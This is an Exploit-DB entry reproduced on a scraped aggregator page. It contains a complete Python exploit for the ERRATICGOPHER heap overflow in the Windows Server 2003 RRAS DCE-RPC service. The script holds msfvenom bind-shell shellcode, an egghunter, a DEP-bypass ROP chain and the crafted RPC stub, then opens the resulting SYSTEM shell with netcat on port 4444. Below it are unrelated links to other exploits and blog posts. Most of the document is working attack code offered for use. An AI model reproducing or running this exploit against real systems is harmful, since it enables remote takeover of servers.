EDB-ID: 41929 Authorvportal Published: 2017-04-25
CVE: N/A TypeRemote PlatformWindows
Aliases: ERRATICGOPHER Advisory/Source: N/A Tags: N/A
E-DB Verified Exploit DownloadView Raw Vulnerable App: N/A 

#!/usr/bin/env python
# -*- coding: utf-8 -*-
##################################################################################
#   By Victor Portal (vportal) for educational porpouse only
##################################################################################
#   This exploit is the python version of the ErraticGopher exploit probably     #
#   with some modifications. ErraticGopher exploits a memory corruption          #
#   (seems to be a Heap Overflow) in the Windows DCE-RPC Call MIBEntryGet.       #
#   Because the Magic bytes, the application redirects the execution to the      #
#   iprtrmgr.dll library, where a instruction REPS MOVS (0x641194f5) copy        #
#   all te injected stub from the heap to the stack, overwritten a return        #
#   address as well as the SEH handler stored in the Stack, being possible       #
#   to control the execution flow to disable DEP and jump to the shellcode       #
#   as SYSTEM user.                                                              #
##################################################################################
#The exploit only works if target has the RRAS service enabled
#Tested on Windows Server 2003 SP2

import struct
import sys
import time
import os

from threading import Thread    

from impacket import smb
from impacket import uuid
from impacket import dcerpc
from impacket.dcerpc.v5 import transport

target = sys.argv[1]

print '[-]Initiating connection'
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
trans.connect()

print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
dce = trans.DCERPC_class(trans)
#RRAS DCE-RPC CALL
dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
egghunter += "\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
buf =  ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"

#NX disable routine for Windows Server 2003 SP2
rop = "\x30\xdb\xc0\x71" #push esp, pop ebp, retn ws_32.dll
rop += "\x45"*16
rop += "\xe9\x77\xc1\x77" #push esp, pop ebp, retn 4 gdi32.dll
rop += "\x5d\x7a\x81\x7c" #ret 20
rop += "\x71\x42\x38\x77" #jmp esp
rop += "\xf6\xe7\xbd\x77" #add esp,2c ; retn msvcrt.dll
rop += "\x90"*2 + egghunter + "\x90"*42
rop += "\x17\xf5\x83\x7c" #Disable NX routine
rop += "\x90"*4

stub = "\x21\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\x08\x00\x00\x00" #Magic bytes
stub += "\x41"*20 + rop + "\xCC"*100 + "w00tw00t" + buf + "\x42"*(1313-20-len(rop)-100-8-len(buf))
stub += "\x12" #Magic byte
stub += "\x46"*522
stub += "\x04\x00\x00\x00\x00\x00\x00\x00" #Magic bytes

dce.call(0x1d, stub)   #0x1d MIBEntryGet (vulnerable function)
print "[-]Exploit sent to target successfully..."

print "Waiting for shell..."
time.sleep(5)
os.system("nc " + target + " 4444")

  

Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution的更多相关文章

  1. Exploiting CVE-2015-2509 /MS15-100 : Windows Media Center could allow remote code execution

    Exploiting CVE-2015-2509 /MS15-100 : Windows Media Center could allow remote code execution Trend Mi ...

  2. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

  3. CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...

  4. Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现

    一.  Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现 漏洞描述: Home Web Server允许调用CGI程序来通过P ...

  5. Tomcat put上传漏洞_CVE2017-12615( JSP Upload Bypass/Remote Code Execution)

    CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution) 一.漏洞原理 在windows服务器下,将readonly参数设 ...

  6. MyBB \inc\class_core.php <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 MyBB's unset_globals() function ca ...

  7. Insecure default in Elasticsearch enables remote code execution

    Elasticsearch has a flaw in its default configuration which makes it possible for any webpage to exe ...

  8. Roundcube 1.2.2 - Remote Code Execution

    本文简要记述一下Roundcube 1.2.2远程代码执行漏洞的复现过程. 漏洞利用条件 Roundcube必须配置成使用PHP的mail()函数(如果没有指定SMTP,则是默认开启) PHP的mai ...

  9. [EXP]Apache Superset < 0.23 - Remote Code Execution

    # Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...

随机推荐

  1. js简单省级联动菜单

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...

  2. 从零开始学习springboot之springboot搭建

    博主刚开始实习不久,还是小白一枚,被公司的各种新奇技术搞得眼花缭乱了好久,主要是用springboot和dubbo构建起来的项目.看完之后才知道springboot真的是java开发者的福音啊 话不多 ...

  3. linux-SSR多用户版配置详解

    前述:好久没有玩服务器,今天有一哥们要浏览下external website,就搭建一个新的服务器(本人用Vultr的Japan2.5$/mon centOs7.0 64位) 嗯,条件差不多了,开始啦 ...

  4. poptest老李谈分布式与集群

    poptest是国内唯一一家培养测试开发工程师的培训机构,以学员能胜任自动化测试,性能测试,测试工具开发等工作为目标.如果对课程感兴趣,请大家咨询qq:908821478,咨询电话010-845052 ...

  5. 老李推荐:第6章7节《MonkeyRunner源码剖析》Monkey原理分析-事件源-事件源概览-注入按键事件实例

    老李推荐:第6章7节<MonkeyRunner源码剖析>Monkey原理分析-事件源-事件源概览-注入按键事件实例   poptest是国内唯一一家培养测试开发工程师的培训机构,以学员能胜 ...

  6. Centos/RHEL上查看主板型号

    老是搞忘记,专门做个记录: [root@media ~]# dmidecode | grep "Product Name" Product Name: To be filled b ...

  7. NodeJs系列二:你好,世界

    安装nodejs 什么是nodejs中的模块 hello,world

  8. 将ImageList中的图片转化成byte数组

    Image imgwd = this.imageList1.Images["wd.png"]; var bytes = ImageToBytes(imgwd); public by ...

  9. cocos2d-x-Json/XML文件

    数据存储几种方式 1. 数据库 2. 文件 3. 内存 这里介绍Json格式与XML格式的文件存储 常用的文件存储数据的格式 1. Json格式 2. XML格式 Json适合存储小数据,XML适合存 ...

  10. 一、iOS中的事件可以分为3大类型

    触摸事件加速计事件远程控制事件 响应者对象在iOS中不是任何对象都能处理事件,只有继承了UIResponder的对象才能接收并处理事件.我们称之为"响应者对象" UIApplica ...